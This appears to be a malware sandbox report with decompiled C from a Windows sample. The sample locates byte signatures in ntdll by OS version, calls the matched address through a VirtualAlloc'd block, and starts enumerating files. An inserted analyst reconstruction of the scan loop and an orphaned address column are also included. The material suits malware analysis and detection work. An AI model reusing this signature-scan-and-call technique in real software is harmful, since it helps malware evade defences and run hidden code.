                                                                                    				_t97 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t97 ^ _t224;
                                                                                    				_t99 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                    				if( *((intOrPtr*)(_t99 + 0xc0)) <= 0 ||  *((intOrPtr*)(_t99 + 0xc4)) <= 0) {
                                                                                    					L94:
                                                                                    					__eflags = _v8 ^ _t224;
                                                                                    					return E04ED572E(_v8 ^ _t224);
                                                                                    				} else {
                                                                                    					_t204 = GetModuleHandleA("ntdll");
                                                                                    					if(_t204 == 0) {
                                                                                    						L93:
                                                                                    						goto L94;
                                                                                    					} else {
                                                                                    						E04EDDAD0(__edi,  &_v316, 0, 0x114);
                                                                                    						_t104 = GetProcAddress(_t204, "RtlGetVersion");
                                                                                    						if(_t104 == 0) {
                                                                                    							goto L93;
                                                                                    						} else {
                                                                                    							_push( &_v316);
                                                                                    							if( *_t104() != 0 || _t204->i != 0x5a4d) {
                                                                                    								goto L93;
                                                                                    							} else {
                                                                                    								_t183 =  *((intOrPtr*)(_t204 + 0x3c)) + _t204;
                                                                                    								if( *_t183 != 0x4550) {
                                                                                    									goto L93;
                                                                                    								} else {
                                                                                    									_t156 = 0;
                                                                                    									_t109 = ( *(_t183 + 0x14) & 0x0000ffff) + 0x18 + _t183;
                                                                                    									_t184 =  *(_t183 + 6) & 0x0000ffff;
                                                                                    									if(_t184 == 0) {
                                                                                    										goto L93;
                                                                                    									} else {
                                                                                    										while(( *(_t109 + 0x24) & 0x20000000) == 0) {
                                                                                    											_t156 = _t156 + 1;
                                                                                    											_t109 = _t109 + 0x28;
                                                                                    											if(_t156 < _t184) {
                                                                                    												continue;
                                                                                    											} else {
                                                                                    												return E04ED572E(_v8 ^ _t224);
                                                                                    											}
                                                                                    											goto L95;
                                                                                    										}
                                                                                    										_t157 =  *(_t109 + 0x10);
                                                                                    										_v324 = _t157;
                                                                                    										_t186 =  *((intOrPtr*)(_t109 + 0xc)) + _t204;
                                                                                    										__eflags = _t186;
                                                                                    										if(_t186 == 0) {
                                                                                    											goto L93;
                                                                                    										} else {
                                                                                    											__eflags = _t157;
                                                                                    											if(_t157 == 0) {
                                                                                    												goto L93;
                                                                                    											} else {
                                                                                    												_t110 = _v312;
                                                                                    												_push(_t141);
                                                                                    												_push(_t187);
                                                                                    												__eflags = _t110 - 0xa;
                                                                                    												if(_t110 != 0xa) {
                                                                                    													__eflags = _t110 - 6;
                                                                                    													if(_t110 != 6) {
                                                                                    														goto L92;
                                                                                    													} else {
                                                                                    														_t111 = _v308;
                                                                                    														__eflags = _t111 - 3;
                                                                                    														if(_t111 == 3) {
                                                                                    															goto L49;
                                                                                    														} else {
                                                                                    															__eflags = _t111 - 2;
                                                                                    															if(_t111 != 2) {
                                                                                    																__eflags = _t111 - 1;
                                                                                    																if(_t111 != 1) {
                                                                                    																	goto L92;
                                                                                    																} else {
                                                                                    																	_v24 = 0x458d2074;
                                                                                    																	_t191 = _t157 - 8;
                                                                                    																	_v20 = 0x96a50d4;
                                                                                    																	_t210 = 0;
                                                                                    																	__eflags = 0;
                                                                                    																	do {
                                                                                    																		_t163 = 0;
                                                                                    																		__eflags = 0;
                                                                                    																		while(1) {
                                                                                    																			_t117 = _t163 + _t210;
                                                                                    																			__eflags =  *((intOrPtr*)(_t117 + _t186)) -  *((intOrPtr*)(_t224 + _t163 - 0x14));
                                                                                    																			if( *((intOrPtr*)(_t117 + _t186)) !=  *((intOrPtr*)(_t224 + _t163 - 0x14))) {
                                                                                    																				break;
                                                                                    																			}
                                                                                    																			_t163 = _t163 + 1;
                                                                                    																			__eflags = _t163 - 8;
                                                                                    																			if(_t163 < 8) {
                                                                                    																				continue;
                                                                                    																			}
                                                                                    																			break;
                                                                                    																		}
                                                                                    																		__eflags = _t163 - 8;
                                                                                    																		if(_t163 == 8) {
                                                                                    																			_t212 = _t210 + 0xffffffec + _t186;
                                                                                    																			__eflags = _t212;
                                                                                    																			if(_t212 == 0) {
                                                                                    																				goto L92;
                                                                                    																			} else {
                                                                                    																				 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                                                    																				 *_t212();
                                                                                    																				__eflags = _v8 ^ _t224;
                                                                                    																				return E04ED572E(_v8 ^ _t224, _t119);
                                                                                    																			}
                                                                                    																		} else {
                                                                                    																			goto L84;
                                                                                    																		}
                                                                                    																		goto L95;
                                                                                    																		L84:
                                                                                    																		_t210 = _t210 + 1;
                                                                                    																		__eflags = _t210 - _t191;
                                                                                    																	} while (_t210 <= _t191);
                                                                                    																	__eflags = _v8 ^ _t224;
                                                                                    																	return E04ED572E(_v8 ^ _t224);
                                                                                    																}
                                                                                    															} else {
                                                                                    																_t146 = 0;
                                                                                    																_v16 = 0x8908458b;
                                                                                    																_v12 = 0xa045;
                                                                                    																_t194 = _t157 - 6;
                                                                                    																_v32 = 0x23fb4868;
                                                                                    																_t215 = 0;
                                                                                    																__eflags = 0;
                                                                                    																_v28 = 0x6a;
                                                                                    																do {
                                                                                    																	_t169 = 0;
                                                                                    																	__eflags = 0;
                                                                                    																	while(1) {
                                                                                    																		_t123 = _t169 + _t215;
                                                                                    																		__eflags =  *((intOrPtr*)(_t123 + _t186)) -  *((intOrPtr*)(_t224 + _t169 - 0xc));
                                                                                    																		if( *((intOrPtr*)(_t123 + _t186)) !=  *((intOrPtr*)(_t224 + _t169 - 0xc))) {
                                                                                    																			break;
                                                                                    																		}
                                                                                    																		_t169 = _t169 + 1;
                                                                                    																		__eflags = _t169 - 6;
                                                                                    																		if(_t169 < 6) {
                                                                                    																			continue;
                                                                                    																		}
                                                                                    																		break;
                                                                                    																	}
                                                                                    																	__eflags = _t169 - 6;
                                                                                    																	if(_t169 == 6) {
                                                                                    																		_t146 = _t186 - 0xc + _t215;
                                                                                    																		__eflags = _t146;
                                                                                    																	} else {
                                                                                    																		goto L64;
                                                                                    																	}
                                                                                    																	L67:
                                                                                    																	__eflags = _t146;
                                                                                    																	if(_t146 != 0) {
                                                                                    																		L77:
                                                                                    																		 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                                                    																		 *_t146();
                                                                                    																		__eflags = _v8 ^ _t224;
                                                                                    																		return E04ED572E(_v8 ^ _t224, _t125);
                                                                                    																	} else {
                                                                                    																		_t217 = 0;
                                                                                    																		_t197 = _v324 + 0xfffffffb;
                                                                                    																		__eflags = _t197;
                                                                                    																		do {
                                                                                    																			_t173 = 0;
                                                                                    																			asm("o16 nop [eax+eax]");
                                                                                    																			while(1) {
                                                                                    																				_t128 = _t173 + _t217;
                                                                                    																				__eflags =  *((intOrPtr*)(_t128 + _t186)) -  *((intOrPtr*)(_t224 + _t173 - 0x1c));
                                                                                    																				if( *((intOrPtr*)(_t128 + _t186)) !=  *((intOrPtr*)(_t224 + _t173 - 0x1c))) {
                                                                                    																					break;
                                                                                    																				}
                                                                                    																				_t173 = _t173 + 1;
                                                                                    																				__eflags = _t173 - 5;
                                                                                    																				if(_t173 < 5) {
                                                                                    																					continue;
                                                                                    																				}
                                                                                    																				break;
                                                                                    																			}
                                                                                    																			__eflags = _t173 - 5;
                                                                                    																			if(_t173 == 5) {
                                                                                    																				_t146 = _t186 - 7 + _t217;
                                                                                    																				__eflags = _t146;
                                                                                    																			} else {
                                                                                    																				goto L73;
                                                                                    																			}
                                                                                    																			L76:
                                                                                    																			__eflags = _t146;
                                                                                    																			if(_t146 == 0) {
                                                                                    																				goto L92;
                                                                                    																			} else {
                                                                                    																				goto L77;
                                                                                    																			}
                                                                                    																			goto L95;
                                                                                    																			L73:
                                                                                    																			_t217 = _t217 + 1;
                                                                                    																			__eflags = _t217 - _t197;
                                                                                    																		} while (_t217 <= _t197);
                                                                                    																		goto L76;
                                                                                    																	}
                                                                                    																	goto L95;
                                                                                    																	L64:
                                                                                    																	_t215 = _t215 + 1;
                                                                                    																	__eflags = _t215 - _t194;
                                                                                    																} while (_t215 <= _t194);
                                                                                    																goto L67;
                                                                                    															}
                                                                                    														}
                                                                                    													}
                                                                                    												} else {
                                                                                    													__eflags = _v308;
                                                                                    													if(_v308 != 0) {
                                                                                    														L92:
                                                                                    														goto L93;
                                                                                    													} else {
                                                                                    														_t150 = _v304;
                                                                                    														__eflags = _t150 - 0x3fab;
                                                                                    														if(_t150 <= 0x3fab) {
                                                                                    															__eflags = _t150 - 0x3ad7 - 0x4d4;
                                                                                    															if(_t150 - 0x3ad7 > 0x4d4) {
                                                                                    																__eflags = _t150 - 0x3ad7;
                                                                                    																if(_t150 >= 0x3ad7) {
                                                                                    																	goto L92;
                                                                                    																} else {
                                                                                    																	L49:
                                                                                    																	_v24 = 0x6a096a50;
                                                                                    																	_t189 = _t157 - 7;
                                                                                    																	_v20 = 0x8b01;
                                                                                    																	_t206 = 0;
                                                                                    																	__eflags = 0;
                                                                                    																	_v18 = 0xc1;
                                                                                    																	do {
                                                                                    																		_t158 = 0;
                                                                                    																		__eflags = 0;
                                                                                    																		while(1) {
                                                                                    																			_t112 = _t158 + _t206;
                                                                                    																			__eflags =  *((intOrPtr*)(_t112 + _t186)) -  *((intOrPtr*)(_t224 + _t158 - 0x14));
                                                                                    																			if( *((intOrPtr*)(_t112 + _t186)) !=  *((intOrPtr*)(_t224 + _t158 - 0x14))) {
                                                                                    																				break;
                                                                                    																			}
                                                                                    																			_t158 = _t158 + 1;
                                                                                    																			__eflags = _t158 - 7;
                                                                                    																			if(_t158 < 7) {
                                                                                    																				continue;
                                                                                    																			}
                                                                                    																			break;
                                                                                    																		}
                                                                                    																		__eflags = _t158 - 7;
                                                                                    																		if(_t158 == 7) {
                                                                                    																			_t207 = _t206 + 0xffffffe5;
                                                                                    																			__eflags = _t207;
                                                                                    																			goto L89;
                                                                                    																		} else {
                                                                                    																			goto L54;
                                                                                    																		}
                                                                                    																		goto L95;
                                                                                    																		L54:
                                                                                    																		_t206 = _t206 + 1;
                                                                                    																		__eflags = _t206 - _t189;
                                                                                    																	} while (_t206 <= _t189);
                                                                                    																	__eflags = _v8 ^ _t224;
                                                                                    																	return E04ED572E(_v8 ^ _t224);
                                                                                    																}
                                                                                    															} else {
                                                                                    																_v16 = 0x4d8dc18b;
                                                                                    																_t198 = _t157 - 6;
                                                                                    																_v12 = 0x51bc;
                                                                                    																_t218 = 0;
                                                                                    																__eflags = 0;
                                                                                    																do {
                                                                                    																	_t174 = 0;
                                                                                    																	__eflags = 0;
                                                                                    																	while(1) {
                                                                                    																		_t131 = _t174 + _t218;
                                                                                    																		__eflags =  *((intOrPtr*)(_t131 + _t186)) -  *((intOrPtr*)(_t224 + _t174 - 0xc));
                                                                                    																		if( *((intOrPtr*)(_t131 + _t186)) !=  *((intOrPtr*)(_t224 + _t174 - 0xc))) {
                                                                                    																			break;
                                                                                    																		}
                                                                                    																		_t174 = _t174 + 1;
                                                                                    																		__eflags = _t174 - 6;
                                                                                    																		if(_t174 < 6) {
                                                                                    																			continue;
                                                                                    																		}
                                                                                    																		break;
                                                                                    																	}
                                                                                    																	__eflags = _t174 - 6;
                                                                                    																	if(_t174 == 6) {
                                                                                    																		_t207 = _t218 + 0xffffffe8;
                                                                                    																		L89:
                                                                                    																		_t208 = _t207 + _t186;
                                                                                    																		__eflags = _t208;
                                                                                    																		goto L90;
                                                                                    																	} else {
                                                                                    																		goto L45;
                                                                                    																	}
                                                                                    																	goto L95;
                                                                                    																	L45:
                                                                                    																	_t218 = _t218 + 1;
                                                                                    																	__eflags = _t218 - _t198;
                                                                                    																} while (_t218 <= _t198);
                                                                                    																__eflags = _v8 ^ _t224;
                                                                                    																return E04ED572E(_v8 ^ _t224);
                                                                                    															}
                                                                                    														} else {
                                                                                    															_v16 = 0x4d8dc18b;
                                                                                    															_t200 =  &_v40;
                                                                                    															_v12 = 0x51ac;
                                                                                    															_v40 = 0xc085f633;
                                                                                    															_v36 = 0x379;
                                                                                    															_v24 = 0x85b04589;
                                                                                    															_v20 = 0x75c0;
                                                                                    															_v18 = 0x12;
                                                                                    															_v320 = 0x2c;
                                                                                    															__eflags = _t150 - 0x42ee;
                                                                                    															if(_t150 != 0x42ee) {
                                                                                    																__eflags = _t150 - 0x47ba;
                                                                                    																if(_t150 == 0x47ba) {
                                                                                    																	L20:
                                                                                    																	_v320 = 0x2e;
                                                                                    																} else {
                                                                                    																	__eflags = _t150 - 0x47bb;
                                                                                    																	if(_t150 == 0x47bb) {
                                                                                    																		goto L20;
                                                                                    																	}
                                                                                    																}
                                                                                    															} else {
                                                                                    																_t200 =  &_v16;
                                                                                    																_v320 = 0x18;
                                                                                    															}
                                                                                    															_t220 = 0;
                                                                                    															_t177 = _t157 + 0xfffffffa;
                                                                                    															__eflags = _t177;
                                                                                    															_v32 = _t177;
                                                                                    															do {
                                                                                    																_t178 = 0;
                                                                                    																asm("o16 nop [eax+eax]");
                                                                                    																while(1) {
                                                                                    																	_t135 = _t178 + _t220;
                                                                                    																	__eflags =  *((intOrPtr*)(_t135 + _t186)) -  *((intOrPtr*)(_t178 + _t200));
                                                                                    																	if( *((intOrPtr*)(_t135 + _t186)) !=  *((intOrPtr*)(_t178 + _t200))) {
                                                                                    																		break;
                                                                                    																	}
                                                                                    																	_t178 = _t178 + 1;
                                                                                    																	__eflags = _t178 - 6;
                                                                                    																	if(_t178 < 6) {
                                                                                    																		continue;
                                                                                    																	}
                                                                                    																	break;
                                                                                    																}
                                                                                    																__eflags = _t178 - 6;
                                                                                    																if(_t178 == 6) {
                                                                                    																	_t208 = _t220 - _v320 + _t186;
                                                                                    																	__eflags = _t208;
                                                                                    																} else {
                                                                                    																	goto L26;
                                                                                    																}
                                                                                    																L29:
                                                                                    																__eflags = _t208;
                                                                                    																if(_t208 != 0) {
                                                                                    																	L91:
                                                                                    																	 *((intOrPtr*)(VirtualAlloc(0, 0x50, 0x3000, 4) + 0x18)) = _a4;
                                                                                    																	 *_t208();
                                                                                    																} else {
                                                                                    																	__eflags = _t150 - 0x4a61;
                                                                                    																	if(_t150 == 0x4a61) {
                                                                                    																		_v32 = 0;
                                                                                    																		_t202 = _v324 + 0xfffffff9;
                                                                                    																		asm("o16 nop [eax+eax]");
                                                                                    																		do {
                                                                                    																			_t179 = 0;
                                                                                    																			__eflags = 0;
                                                                                    																			while(1) {
                                                                                    																				_t138 = _t179 + _t208;
                                                                                    																				__eflags =  *((intOrPtr*)(_t138 + _t186)) -  *((intOrPtr*)(_t224 + _t179 - 0x14));
                                                                                    																				if( *((intOrPtr*)(_t138 + _t186)) !=  *((intOrPtr*)(_t224 + _t179 - 0x14))) {
                                                                                    																					break;
                                                                                    																				}
                                                                                    																				_t179 = _t179 + 1;
                                                                                    																				__eflags = _t179 - 7;
                                                                                    																				if(_t179 < 7) {
                                                                                    																					continue;
                                                                                    																				}
                                                                                    																				break;
                                                                                    																			}
                                                                                    																			__eflags = _t179 - 7;
                                                                                    																			if(_t179 == 7) {
                                                                                    																				_t208 = _t208 + 0xffffffd8 + _t186;
                                                                                    																				__eflags = _t208;
                                                                                    																			} else {
                                                                                    																				goto L36;
                                                                                    																			}
                                                                                    																			L90:
                                                                                    																			if(__eflags != 0) {
                                                                                    																				goto L91;
                                                                                    																			}
                                                                                    																			goto L92;
                                                                                    																			L36:
                                                                                    																			_t208 = _t208 + 1;
                                                                                    																			__eflags = _t208 - _t202;
                                                                                    																		} while (_t208 <= _t202);
                                                                                    																		_t208 = _v32;
                                                                                    																		__eflags = _t208;
                                                                                    																		goto L90;
                                                                                    																	}
                                                                                    																}
                                                                                    																goto L92;
                                                                                    																L26:
                                                                                    																_t220 = _t220 + 1;
                                                                                    																__eflags = _t220 - _v32;
                                                                                    															} while (_t220 <= _v32);
                                                                                    															_t208 = 0;
                                                                                    															goto L29;
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L95:
                                                                                    			}
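Read as a whole, the nested loops above are a signature scan rather than ordinary data processing: an inner loop compares the element at the candidate position plus `_t179` against a fixed reference (`_t224 + _t179 - 0x14`) and breaks on the first mismatch, the outer loop advances the candidate until the upper bound (`_v324 + 0xfffffff9`, i.e. length minus 7), and `_t179 == 7` (or `_t178 == 6` in the first loop) means every element matched. The second scan runs only when a 16-bit value equals 0x4a61. On a hit the code derives a pointer from the match position (`_t208 + 0xffffffd8 + _t186`, i.e. image base plus offset minus 0x28), obtains a 0x50-byte block with `VirtualAlloc(0, 0x50, 0x3000, 4)` (0x3000 is MEM_COMMIT | MEM_RESERVE, 4 is PAGE_READWRITE), stores the function's first argument at offset 0x18 of that block, and calls the resolved address through `*_t208()`. The following C is an analyst's reconstruction added here, not the sample's own code or anything from the report: byte-wide compares (the decompiler left the width as `intOrPtr`), the marker bytes, the image base, the `launch_ctx` field names and the `calloc` stand-in for `VirtualAlloc` are all assumptions, and the example stops short of the indirect call.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Scan loop as reconstructed from the decompile: return the offset of the
 * first position in buf[0..len) whose next patlen bytes equal pat, or -1.
 * Inner loop walks the pattern and stops at the first mismatch; outer loop
 * advances the candidate while it is still <= len - patlen (the decompile's
 * "_v324 + 0xfffffff9" upper bound for its 7-byte pattern). Byte-wide
 * compares are an assumption: the decompiler left the width as intOrPtr. */
long find_pattern(const uint8_t *buf, size_t len,
                  const uint8_t *pat, size_t patlen)
{
    if (patlen == 0 || len < patlen)
        return -1;
    for (size_t pos = 0; pos <= len - patlen; pos++) {
        size_t i = 0;
        while (i < patlen && buf[pos + i] == pat[i])
            i++;
        if (i == patlen)
            return (long)pos;
    }
    return -1;
}

/* Second stage of the decompile: find the 7-byte marker and take the address
 * 0x28 bytes before it (0xffffffd8 == -0x28) relative to the image base.
 * Returns 0 when the marker is absent or sits too close to the start. */
uintptr_t resolve_target(uintptr_t image_base, const uint8_t *image,
                         size_t image_len, const uint8_t marker[7])
{
    long off = find_pattern(image, image_len, marker, 7);
    if (off < 0x28)             /* also covers the -1 "not found" case */
        return 0;
    return image_base + (uintptr_t)off - 0x28;
}

/* The 0x50-byte block the sample gets from
 * VirtualAlloc(NULL, 0x50, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)
 * (0x3000, 4 in the decompile) and fills at +0x18 with its first argument
 * before the indirect call. Only the size and the +0x18 slot are visible;
 * the field name and the 4-byte width (32-bit sample) are assumptions. */
struct launch_ctx {
    uint8_t  head[0x18];
    uint32_t arg;                              /* _a4 in the decompile */
    uint8_t  tail[0x50 - 0x18 - sizeof(uint32_t)];
};
_Static_assert(sizeof(struct launch_ctx) == 0x50, "block must be 0x50 bytes");
_Static_assert(offsetof(struct launch_ctx, arg) == 0x18, "arg slot at +0x18");

/* calloc stands in for VirtualAlloc so this runs off Windows. Caller frees.
 * The sample would now call the resolved address; this example stops here. */
struct launch_ctx *make_launch_ctx(uint32_t arg)
{
    struct launch_ctx *ctx = calloc(1, sizeof *ctx);
    if (ctx)
        ctx->arg = arg;
    return ctx;
}

/* Allocate, read back the +0x18 slot, free: exercises the block layout. */
uint32_t demo_ctx_arg(uint32_t v)
{
    struct launch_ctx *ctx = make_launch_ctx(v);
    uint32_t got = ctx ? ctx->arg : 0;
    free(ctx);
    return got;
}

/* Constructed test image: NOP filler, a 4-byte false prefix of the marker at
 * 0x20 that the scanner must skip, and the full marker at 0x60. */
static const uint8_t MARKER[7] = { 'M', 'A', 'R', 'K', 'E', 'R', '!' };
#define IMAGE_LEN  0x80
#define IMAGE_BASE 0x10000000u                 /* arbitrary, constructed */

static void build_image(uint8_t out[IMAGE_LEN])
{
    memset(out, 0x90, IMAGE_LEN);
    memcpy(out + 0x20, MARKER, 4);
    memcpy(out + 0x60, MARKER, sizeof MARKER);
}

long demo_find_offset(void)
{
    uint8_t img[IMAGE_LEN];
    build_image(img);
    return find_pattern(img, IMAGE_LEN, MARKER, sizeof MARKER);
}

/* visible_len lets the caller truncate the image to check the bound. */
uintptr_t demo_resolve(size_t visible_len)
{
    uint8_t img[IMAGE_LEN];
    build_image(img);
    return resolve_target(IMAGE_BASE, img, visible_len, MARKER);
}

int main(void)
{
    printf("marker at +0x%lx, target 0x%lx\n",
           demo_find_offset(), (unsigned long)demo_resolve(IMAGE_LEN));
    printf("ctx arg at +0x18 = 0x%x\n", demo_ctx_arg(0x1234));
    return 0;
}
```

The false prefix at 0x20 is there deliberately: a scanner that only checks the first few bytes, or that forgets to reset the inner index, reports 0x20 instead of 0x60, which is exactly the kind of off-by-one that makes a hand-written detection signature for this loop fire in the wrong place.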
(Instruction address column of the decompiled function, spanning 0x04ebc990 to 0x04ebcdeb, extracted here without the instruction text it belonged to.)
                                                                                    0x04ebcbe5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcbe5
                                                                                    0x04ebcbe7
                                                                                    0x04ebcbea
                                                                                    0x04ebcc04
                                                                                    0x04ebcdbc
                                                                                    0x04ebcdbc
                                                                                    0x04ebcdbc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcbec
                                                                                    0x04ebcbec
                                                                                    0x04ebcbed
                                                                                    0x04ebcbed
                                                                                    0x04ebcbf7
                                                                                    0x04ebcc01
                                                                                    0x04ebcc01
                                                                                    0x04ebcab5
                                                                                    0x04ebcab5
                                                                                    0x04ebcabc
                                                                                    0x04ebcabf
                                                                                    0x04ebcac5
                                                                                    0x04ebcacc
                                                                                    0x04ebcad2
                                                                                    0x04ebcad9
                                                                                    0x04ebcadf
                                                                                    0x04ebcae3
                                                                                    0x04ebcaed
                                                                                    0x04ebcaf3
                                                                                    0x04ebcb04
                                                                                    0x04ebcb0a
                                                                                    0x04ebcb14
                                                                                    0x04ebcb14
                                                                                    0x04ebcb0c
                                                                                    0x04ebcb0c
                                                                                    0x04ebcb12
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb12
                                                                                    0x04ebcaf5
                                                                                    0x04ebcaf5
                                                                                    0x04ebcaf8
                                                                                    0x04ebcaf8
                                                                                    0x04ebcb20
                                                                                    0x04ebcb22
                                                                                    0x04ebcb22
                                                                                    0x04ebcb25
                                                                                    0x04ebcb28
                                                                                    0x04ebcb28
                                                                                    0x04ebcb2a
                                                                                    0x04ebcb30
                                                                                    0x04ebcb30
                                                                                    0x04ebcb36
                                                                                    0x04ebcb39
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb3b
                                                                                    0x04ebcb3c
                                                                                    0x04ebcb3f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb3f
                                                                                    0x04ebcb41
                                                                                    0x04ebcb44
                                                                                    0x04ebcb56
                                                                                    0x04ebcb56
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb58
                                                                                    0x04ebcb58
                                                                                    0x04ebcb5a
                                                                                    0x04ebcdc0
                                                                                    0x04ebcdd4
                                                                                    0x04ebcdd9
                                                                                    0x04ebcb60
                                                                                    0x04ebcb60
                                                                                    0x04ebcb66
                                                                                    0x04ebcb74
                                                                                    0x04ebcb77
                                                                                    0x04ebcb7a
                                                                                    0x04ebcb80
                                                                                    0x04ebcb80
                                                                                    0x04ebcb80
                                                                                    0x04ebcb82
                                                                                    0x04ebcb82
                                                                                    0x04ebcb88
                                                                                    0x04ebcb8c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb8e
                                                                                    0x04ebcb8f
                                                                                    0x04ebcb92
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb92
                                                                                    0x04ebcb94
                                                                                    0x04ebcb97
                                                                                    0x04ebcbab
                                                                                    0x04ebcbad
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcdbe
                                                                                    0x04ebcdbe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebcb99
                                                                                    0x04ebcb99
                                                                                    0x04ebcb9a
                                                                                    0x04ebcb9a
                                                                                    0x04ebcb9e
                                                                                    0x04ebcba1
                                                                                    0x00000000
                                                                                    0x04ebcba1
                                                                                    0x04ebcb66
                                                                                    0x00000000
                                                                                    0x04ebcb46
                                                                                    0x04ebcb46
                                                                                    0x04ebcb47
                                                                                    0x04ebcb47
                                                                                    0x04ebcb4c
                                                                                    0x00000000
                                                                                    0x04ebcb4c
                                                                                    0x04ebcaaf
                                                                                    0x04ebca9d
                                                                                    0x04ebca90
                                                                                    0x04ebca7f
                                                                                    0x04ebca77
                                                                                    0x04ebca41
                                                                                    0x04ebca2a
                                                                                    0x04ebca0b
                                                                                    0x04ebc9fa
                                                                                    0x04ebc9d0
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(ntdll,00000000), ref: 04EBC9C6
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 04EBC9F2
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000050,00003000,00000004,?,74E043E0), ref: 04EBCDCB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressAllocHandleModuleProcVirtual
                                                                                    • String ID: .$Pjj$RtlGetVersion$j$ntdll
                                                                                    • API String ID: 3695083113-758095414
                                                                                    • Opcode ID: 4397ec83f09341214a2f89542ecefb1237a0ba40f46b66240b5bd5da8565318a
                                                                                    • Instruction ID: bf5ec104e2fcca899c3cc35a8523810060c2b759b92096ca6fcd1042b7889ae6
                                                                                    • Opcode Fuzzy Hash: 4397ec83f09341214a2f89542ecefb1237a0ba40f46b66240b5bd5da8565318a
                                                                                    • Instruction Fuzzy Hash: 96C10475E481188ACB39CF58C8907FEBB60EF45318F3122AEC9D66B681D7316946CBD4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 57%
                                                                                    			E04EB4C20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                    				signed int _v12;
                                                                                    				short _v1056;
                                                                                    				intOrPtr _v1624;
                                                                                    				struct _WIN32_FIND_DATAW _v1648;
                                                                                    				char _v1649;
                                                                                    				long _v1656;
                                                                                    				void* _v1660;
                                                                                    				intOrPtr _v1664;
                                                                                    				signed int _t47;
                                                                                    				void* _t54;
                                                                                    				signed int _t56;
                                                                                    				signed int _t57;
                                                                                    				signed int _t66;
                                                                                    				signed int _t67;
                                                                                    				intOrPtr _t83;
                                                                                    				void* _t84;
                                                                                    				intOrPtr _t85;
                                                                                    				intOrPtr* _t87;
                                                                                    				void* _t95;
                                                                                    				intOrPtr _t96;
                                                                                    				intOrPtr _t97;
                                                                                    				intOrPtr _t98;
                                                                                    				void* _t100;
                                                                                    				void* _t101;
                                                                                    				void* _t102;
                                                                                    				long _t104;
                                                                                    				void* _t106;
                                                                                    				signed int _t107;
                                                                                    				void* _t108;
                                                                                    				void* _t109;
                                                                                    
                                                                                    				_t85 = __ecx;
                                                                                    				_t47 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t47 ^ _t107;
                                                                                    				_t83 = __ecx;
                                                                                    				_t104 = 0x2800;
                                                                                    				_v1664 = __ecx;
                                                                                    				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                                                                                    				_v1656 = 0x2800;
                                                                                    				wsprintfW( &_v1056, L"%s\\*.*", _a4);
                                                                                    				_t109 = _t108 + 0xc;
                                                                                    				_t54 = FindFirstFileW( &_v1056,  &_v1648);
                                                                                    				_v1660 = _t54;
                                                                                    				if(_t54 != 0xffffffff) {
                                                                                    					_t84 = LocalAlloc(0x40, 0x2800);
                                                                                    					_t100 = 1;
                                                                                    					 *_t84 = 0x69;
                                                                                    					do {
                                                                                    						_t14 = _t104 - 0x410; // 0x23f0
                                                                                    						if(_t100 > _t14) {
                                                                                    							_t104 = _t104 + 0x410;
                                                                                    							_v1656 = _t104;
                                                                                    							_t84 = LocalReAlloc(_t84, _t104, 0x42);
                                                                                    						}
                                                                                    						_t87 = ".";
                                                                                    						_t56 =  &(_v1648.cFileName);
                                                                                    						while(1) {
                                                                                    							_t95 =  *_t56;
                                                                                    							if(_t95 !=  *_t87) {
                                                                                    								break;
                                                                                    							}
                                                                                    							if(_t95 == 0) {
                                                                                    								L10:
                                                                                    								_t57 = 0;
                                                                                    							} else {
                                                                                    								_t98 =  *((intOrPtr*)(_t56 + 2));
                                                                                    								_t18 = _t87 + 2; // 0x2e0000
                                                                                    								if(_t98 !=  *_t18) {
                                                                                    									break;
                                                                                    								} else {
                                                                                    									_t56 = _t56 + 4;
                                                                                    									_t87 = _t87 + 4;
                                                                                    									if(_t98 != 0) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L10;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							L12:
                                                                                    							if(_t57 != 0) {
                                                                                    								_t66 = L"..";
                                                                                    								_t87 =  &(_v1648.cFileName);
                                                                                    								while(1) {
                                                                                    									_t96 =  *_t87;
                                                                                    									if(_t96 !=  *_t66) {
                                                                                    										break;
                                                                                    									}
                                                                                    									if(_t96 == 0) {
                                                                                    										L18:
                                                                                    										_t67 = 0;
                                                                                    									} else {
                                                                                    										_t97 =  *((intOrPtr*)(_t87 + 2));
                                                                                    										_t21 = _t66 + 2; // 0x2e
                                                                                    										if(_t97 !=  *_t21) {
